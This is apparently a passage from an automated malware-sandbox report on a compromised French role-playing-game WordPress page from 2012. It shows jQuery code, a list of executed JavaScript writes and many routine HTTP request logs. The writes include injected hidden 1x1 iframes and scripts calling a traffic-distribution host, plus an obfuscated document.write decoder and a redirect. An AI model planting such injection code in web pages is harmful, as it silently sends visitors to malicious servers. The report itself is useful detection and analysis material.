                offset.left -= num(this, 'marginLeft');
                parentOffset.top += num(b, 'borderTopWidth');
                parentOffset.left += num(b, 'borderLeftWidth');
                results = {
                    top: offset.top - parentOffset.top,
                    left: offset.left - parentOffset.left
                }
            }
            return results
        },
        offsetParent: function() {
            var a = this[0].offsetParent;
            while (a && (!/^body|html$/i.test(a.tagName) && D.css(a, 'position') == 'static')) a = a.offsetParent;
            return D(a)
        }
    });
    D.each(['Left', 'Top'], function(i, b) {
        var c = 'scroll' + b;
        D.fn[c] = function(a) {
            if (!this[0]) return;
            return a != undefined ? this.each(function() {
                this == window || this == document ? window.scrollTo(!i ? a : D(window).scrollLeft(), i ? a : D(window).scrollTop()) : this[c] = a
            }) : this[0] == window || this[0] == document ? self[i ? 'pageYOffset' : 'pageXOffset'] || D.boxModel && document.documentElement[c] || document.body[c] : this[0][c]
        }
    });
    D.each(["Height", "Width"], function(i, b) {
        var c = i ? "Left" : "Top",
            br = i ? "Right" : "Bottom";
        D.fn["inner" + b] = function() {
            return this[b.toLowerCase()]() + num(this, "padding" + c) + num(this, "padding" + br)
        };
        D.fn["outer" + b] = function(a) {
            return this["inner" + b]() + num(this, "border" + c + "Width") + num(this, "border" + br + "Width") + (a ? num(this, "margin" + c) + num(this, "margin" + br) : 0)
        }
    })
})();

Executed Writes (5)

#1 JavaScript::Write (size: 233, repeated: 1)

<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>

#2 JavaScript::Write (size: 221, repeated: 1)

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

#3 JavaScript::Write (size: 193, repeated: 1)

<script src="http://itsallbreaksoft.net/tds/in.cgi?2&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&default_keyword=notdefine"></script>

#4 JavaScript::Write (size: 84, repeated: 1)

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#5 JavaScript::Write (size: 652, repeated: 1)

<script>document.write("<script src=\""+"http://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine"+"\"><\/script>");</script>
<script>
if(typeof(h)=="undefined"){	
	document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>"); 
}
else if(h.indexOf("http:")==0){
		window.location=h;
}
</script>


HTTP Transactions (263)


Request Response
GET /site/wp-content/plugins/quotes-collection/quotes-collection.css HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Wed, 04 Feb 2009 12:23:40 GMT
Etag: &quot;18383aa-343-46216db9acb00&quot;
Accept-Ranges: bytes
Content-Length: 835
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /site/wp-content/plugins/quotes-collection/quotes-collection.js HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Wed, 04 Feb 2009 12:23:40 GMT
Etag: &quot;18702fc-5c5-46216db9acb00&quot;
Accept-Ranges: bytes
Content-Length: 1477
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /site/wp-includes/js/tw-sack.js?ver=1.6.1 HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 17:47:09 GMT
Etag: &quot;18382c2-1369-461f324c9e140&quot;
Accept-Ranges: bytes
Content-Length: 4969
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /avatar/83a3040bb320636fe490d35a9c3db75c?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/83a3040bb320636fe490d35a9c3db75c?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:33 GMT
Expires: Tue, 06 Nov 2012 11:55:33 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E0)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995577
Content-Length: 3450
GET /avatar/3507cdab3a6032a66915b16c2ca5bb3c?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3507cdab3a6032a66915b16c2ca5bb3c?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:33 GMT
Expires: Tue, 06 Nov 2012 11:55:33 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E6)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254118932
Content-Length: 5066
GET /site/wp-content/themes/eGamer/images/pages-bg-right.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 00:26:34 GMT
Etag: &quot;183830c-9b-461f8b936c280&quot;
Accept-Ranges: bytes
Content-Length: 155
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /avatar/c398e3a288da027968efa53b0e87ac31?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c398e3a288da027968efa53b0e87ac31?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:33 GMT
Expires: Tue, 06 Nov 2012 11:55:33 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718165
Content-Length: 4206
GET /avatar/d31069bddeed190cd43c692c3be77327?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d31069bddeed190cd43c692c3be77327?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:33 GMT
Expires: Tue, 06 Nov 2012 11:55:33 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254118935
Content-Length: 3554
GET /avatar/9db97e15c3ac78599428123084322a76?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9db97e15c3ac78599428123084322a76?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:33 GMT
Expires: Tue, 06 Nov 2012 11:55:33 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718164
Content-Length: 3710
GET /avatar/ac3c61716c8a66d722b890ae3a4fd8a4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/ac3c61716c8a66d722b890ae3a4fd8a4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:33 GMT
Expires: Tue, 06 Nov 2012 11:55:33 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163129
Content-Length: 5067
GET /site/wp-content/themes/eGamer/style.css HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Fri, 06 Feb 2009 22:11:39 GMT
Etag: &quot;18382e2-4210-462474e145cc0&quot;
Accept-Ranges: bytes
Content-Length: 16912
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/timthumb.php?src=http://www.rpgmagazine.fr/imagesdusite/gam_horsearmor_619.jpg&h=150&w=150&zc=1 HTTP/1.1

Host: www.rpgmagazine.fr
GET /site/wp-content/themes/eGamer/timthumb.php?src=http://www.rpgmagazine.fr/imagesdusite/gam_horsearmor_619.jpg&amp;h=150&amp;w=150&amp;zc=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
X-Powered-By: PHP/5.2.11
Accept-Ranges: bytes
Last-Modified: Tue, 03 Feb 2009 22:24:17 GMT
Content-Length: 8312
Cache-Control: max-age=9999, must-revalidate
Etag: e046ede63264b10130007afca077877f
Expires: Tue, 06 Nov 2012 14:37:12GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/star-large-1.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Thu, 05 Feb 2009 00:26:13 GMT
Etag: &quot;183831e-48e-46220f3a51340&quot;
Accept-Ranges: bytes
Content-Length: 1166
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/comment-bottom.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:52 GMT
Etag: &quot;18382fc-7a8-461f3a818fe00&quot;
Accept-Ranges: bytes
Content-Length: 1960
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/js/jquery.js?ver=1.2.6 HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:24:21 GMT
Etag: &quot;1838339-7939-461f3a9d37f40&quot;
Accept-Ranges: bytes
Content-Length: 31033
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /site/?p=156 HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 11:50:33 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
X-Powered-By: PHP/5.2.11
X-Pingback: http://www.rpgmagazine.fr/site/xmlrpc.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /site/wp-content/themes/eGamer/pagenavi-css.css HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Thu, 05 Feb 2009 19:03:23 GMT
Etag: &quot;18382dd-4a7-462308ef1b4c0&quot;
Accept-Ranges: bytes
Content-Length: 1191
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /avatar/1a102a10ee2bb5b55911928134327b08?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1a102a10ee2bb5b55911928134327b08?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FD)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 934422265
Content-Length: 7236
GET /avatar/9b153624f19a4c7488839d50a883d571?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9b153624f19a4c7488839d50a883d571?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995579
Content-Length: 4493
GET /avatar/a717516dfdce954d5e87b94f0e2e6902?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/a717516dfdce954d5e87b94f0e2e6902?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E6)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163131
Content-Length: 5743
GET /avatar/0301a3de446c12f79123585f5597fd19?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0301a3de446c12f79123585f5597fd19?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/467E)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163132
Content-Length: 4209
GET /avatar/f9d5cedc387dc124f86acad574819636?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/f9d5cedc387dc124f86acad574819636?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272635
Content-Length: 5216
GET /avatar/76cfc370cc4ce6cc4f95c5cd11b558c2?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/76cfc370cc4ce6cc4f95c5cd11b558c2?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718167
Content-Length: 5434
GET /site/wp-content/themes/eGamer/js/superfish.js HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:24:23 GMT
Etag: &quot;183833c-ef2-461f3a9f203c0&quot;
Accept-Ranges: bytes
Content-Length: 3826
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /avatar/252c9c52268acb490ea6f52b251bb35a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/252c9c52268acb490ea6f52b251bb35a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817737
Content-Length: 4195
GET /avatar/5d53a4fc40c4a63d69b85b3b7f2c5f56?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/5d53a4fc40c4a63d69b85b3b7f2c5f56?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099241
Content-Length: 5497
GET /avatar/58a1844269317e55bc077db79f3df785?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
